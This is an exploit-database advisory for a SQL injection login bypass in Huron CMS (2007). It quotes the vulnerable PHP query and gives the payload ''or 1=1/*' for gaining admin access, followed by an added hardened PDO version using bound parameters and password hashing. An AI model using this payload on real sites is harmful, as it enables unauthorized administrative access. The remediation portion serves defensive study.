Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability

2010-03-30T00:00:00
ID 1337DAY-ID-11530
Type zdt
Reporter Mat
Modified 2010-03-30T00:00:00

Description

Exploit for the PHP platform in the web applications category

                                        
=============================================================
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
=============================================================

        \\\|///
      \\  - -  //
       (  @ @ )
----oOOo--(_)-oOOo--------------------------------------------------
Huron CMS 8 11 2007 (Auth Bypass) SQL Injection Vulnerability
Script: http://huroncms.googlecode.com/files/Huron_28_11_2007.zip
Author: mat
Mail: [email protected]
---------------Ooooo------------------------------------------------
               (   )
      ooooO     ) /
      (   )    (_/
       \ (
        \_)
 
//------------------------------------------------------------------+
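<?
    // Vulnerable: $_POST['usr'] and $_POST['pas'] are concatenated into the SQL string unescaped.
    $consulta = "select user from Administrador where user='".$_POST['usr']."' AND password='".$_POST['pas']."'";
    $resultado=mysql_query($consulta,$link);
    $i=0;
    while($row = mysql_fetch_array($resultado))
    {
        $i++;
    }
    // The login succeeds whenever the query returns at least one row.
    if($i>0){
?>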
//------------------------------------------------------------------+
 
http://[target]/[path]/index.php
 
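Enter the following as both username and password: 'or 1=1/*
You will be logged in as admin, because the query is built from the unescaped POST values and the check only counts the rows it returns.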
 
Greetings: All Hackerz
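
The hardened form of the login check quoted above, as an added example that is not Huron CMS code: it binds the username as a parameter and verifies a stored password hash instead of counting returned rows. The table and column names come from the advisory's query; the function name admin_login, the in-memory SQLite database, the sample account and the use of password_hash() values in the password column are assumptions made for the example.

```php
<?php
// Added example, not Huron CMS code. Table/column names follow the advisory's
// query; storing password_hash() output in `password` is an assumption.

function admin_login(PDO $db, string $usr, string $pas): bool
{
    // Placeholder binding: $usr travels as data and is never parsed as SQL.
    $stmt = $db->prepare('SELECT password FROM Administrador WHERE user = :usr');
    $stmt->execute([':usr' => $usr]);
    $hash = $stmt->fetchColumn();

    // No row for this exact username: reject. The original code accepted
    // any result set with one or more rows.
    if (!is_string($hash)) {
        return false;
    }

    // The password never enters the query; it is checked against the hash.
    return password_verify($pas, $hash);
}

// Constructed in-memory database so the example runs offline (needs pdo_sqlite).
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE Administrador (user TEXT PRIMARY KEY, password TEXT NOT NULL)');

// Constructed sample account.
$ins = $db->prepare('INSERT INTO Administrador (user, password) VALUES (?, ?)');
$ins->execute(['admin', password_hash('constructed-sample-password', PASSWORD_DEFAULT)]);

// The string from the advisory, submitted in both fields as described there.
$input = "'or 1=1/*";

$cases = [
    'advisory input in both fields' => admin_login($db, $input, $input),
    'valid user, wrong password'    => admin_login($db, 'admin', 'wrong'),
    'valid user, correct password'  => admin_login($db, 'admin', 'constructed-sample-password'),
];

foreach ($cases as $label => $ok) {
    echo str_pad($label, 32), $ok ? 'accepted' : 'rejected', PHP_EOL;
}
```

The mysql_* functions used in the original snippet were removed in PHP 7, so a port needs PDO or mysqli in any case. With the MySQL PDO driver, setting PDO::ATTR_EMULATE_PREPARES to false makes the server perform the parameter binding.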



#  0day.today [2018-04-05]  #